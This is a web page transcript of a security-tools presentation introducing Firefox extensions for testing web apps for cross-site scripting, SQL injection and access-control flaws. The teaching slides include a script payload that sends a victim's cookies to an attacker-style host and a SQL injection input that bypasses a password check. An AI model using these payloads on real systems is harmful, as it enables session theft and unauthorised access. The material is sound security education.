1 / 27

Exploit-Me

Exploit-Me. Firefox Plug-ins for Application Penetration Testing. Who are we?. Tom Aratyn Software Developer at Security Compass Developed the Exploit Me tools. Who are we?. Jamie Security Consultant for Security Compass

Download Presentation

Exploit-Me

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Exploit-Me Firefox Plug-ins for Application Penetration Testing

  2. Who are we? • Tom Aratyn • Software Developer at Security Compass • Developed the Exploit Me tools 2

  3. Who are we? • Jamie • Security Consultant for Security Compass • Background in security research, penetration testing, and software development 3

  4. Agenda Cross-site scripting, really a danger? State of web application security XSS-Me SQL Inject-Me Access Me 4

  5. XSS – Really a Danger? • We know XSS can be dangerous, but can we use it to rob a bank? • AJAX + CSRF + XSS = Major problem 5

  6. Two Exciting Flavours • Reflected • Spit back as soon as it goes in • XSS-Me helps here • Stored • Saving it for someone else • XSS-Me future version 6

  7. What is this XSS Stuff <SCRIPT> location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+ escape(document.cookie); </SCRIPT> • Un-validated user input executed by the users computer • JavaScript is typically used • PDF files are XSS-able • Someone took my cookie 7

  8. Someone Changed my App • AJAX is adding a new element into these attacks • AJAX was used in the IBDBank attack • Attacker can play with data as if the victim is doing it • Send • Receive • Parse 8

  9. State of Web App Insecurity 9 Web app exploits outnumber buffer overflows in CVE Large portion of web apps suffer from XSS or SQL Injection

  10. Testing Tools • Various tools exist • OWASP tools, commercial, Open Source • Work very well • For what they were built to do 10

  11. The Missing Piece Most tools not for developers or QA Developers and QA must be checking for security vulnerabilities Need lightweight tools 11

  12. XSS-Me 0.4 to the Rescue Firefox extension to test for cross-site scripting 12

  13. XSS-Me Features Pick forms & fields to test Firefox 3 Import/export/add/remove XSS strings Test & Surf Heuristics to limit tests 13

  14. Heuristics? • Checking all attacks against all fields is slow. • No, trust me, it’s slow • Heuristic tests limit the fields we have to check by determining if we can inject them • Passes set of characters and checks if they’re returned (;\/<>=‘”) 14

  15. Behind the Magic • Attempts to set document.vulnerable=true into the DOM • If property set, attack worked • Also checks for plain text string, a potential vulnerability • OnMouseOver injection 15

  16. Thank $deity for Struts • Everyone says use Struts to protect yourself • Sure, just don’t follow the supplied examples 16

  17. Being Bobby sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'" User Input: username = jimmy password = blah’ OR ‘1’=‘1 SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’ • Since “WHERE 1=1” is true for all records the entire table is returned! Courtesy XKCD.com 17

  18. No Excuse • Defence is well known and faster than what you’re doing now • Prepared Statements • Stored Procedure • Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right? 18

  19. SQL Inject-Me 0.4 Firefox extension to check for SQL injection 19

  20. SQL Inject-Me Features Pick what you test Configure attack and success strings Large default string set Firefox 3 Test & Surf 20

  21. What’s your method Web/application servers maybe vulnerable to HTTP Verb Tampering attacks Bypasses common authorization configurations 21

  22. Access Me 0.2 22 Firefox extension to check for authentication issues

  23. Access Me Features Checks for unauthenticated access vulnerabilities Checks for HTTP verb vulnerabilities Regular expression based parameter detection Automatic test as you surf 23

  24. Detecting Access Vulnerabilities 24 Failed if response status is 200 and response too similar Warning if response status is 200 or response too similar

  25. Where can you get ‘em • Available off of our website • www.securitycompass.com • Extra XSS-Me attack strings also available from site • Open sourced under GPL v3 25

  26. The Future... • May include • Spidering • Stored attacks 26

  27. Questions • Lets have ‘em • tom@securitycompass.com • jamie@securitycompass.com 27

More Related